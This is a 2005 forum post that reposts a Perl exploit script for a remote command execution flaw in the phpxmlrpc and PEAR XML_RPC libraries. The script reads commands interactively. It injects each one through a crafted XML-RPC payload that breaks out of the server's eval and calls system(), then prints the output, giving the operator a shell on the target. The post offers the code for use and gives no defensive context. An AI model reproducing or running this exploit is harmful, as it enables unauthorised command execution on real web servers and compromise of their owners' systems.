Forums: [perl]-[xml-rpc Remote Command Execution Exploit] - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

[perl]-[xml-rpc Remote Command Execution Exploit]

#1 User is offline   raging_bull 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 36
  • Joined: 21-June 05

Posted 04 July 2005 - 07:54 AM 

#!/usr/bin/perl -w
# ********************************************************
# XML-RPC Remote Command Execution Exploit By Mike Rifone
# ********************************************************
# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
# you need is to put the url to the server and u get shell
# Dis is my first exploit but hey it works :D ~Mike@Rifone
# ********************************************************

use LWP::UserAgent;

$brws = new LWP::UserAgent;
$brws->agent("Internet Explorer 6.0");

$host = $ARGV[0]; 

if ( !$host ) 
{ 
	die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver"); 
}

while ( $host ) 
{

	print "xmlrpc\@\#";
	
	$exec = <STDIN>;	
	$data = "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>";
	
	$send = new HTTP::Request POST => $host;
	$send->content($data);
	$gots = $brws->request($send);	
	$show = $gots->content;
	
	if ( $show =~ /<b>([\d]{1,10})<\/b><br \/>(.*)/is )
	{
     print $2 . "\n";
	}
	else
	{
  print "$show\n";
	}


}

# milw0rm.com [2005-07-04]

0
Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting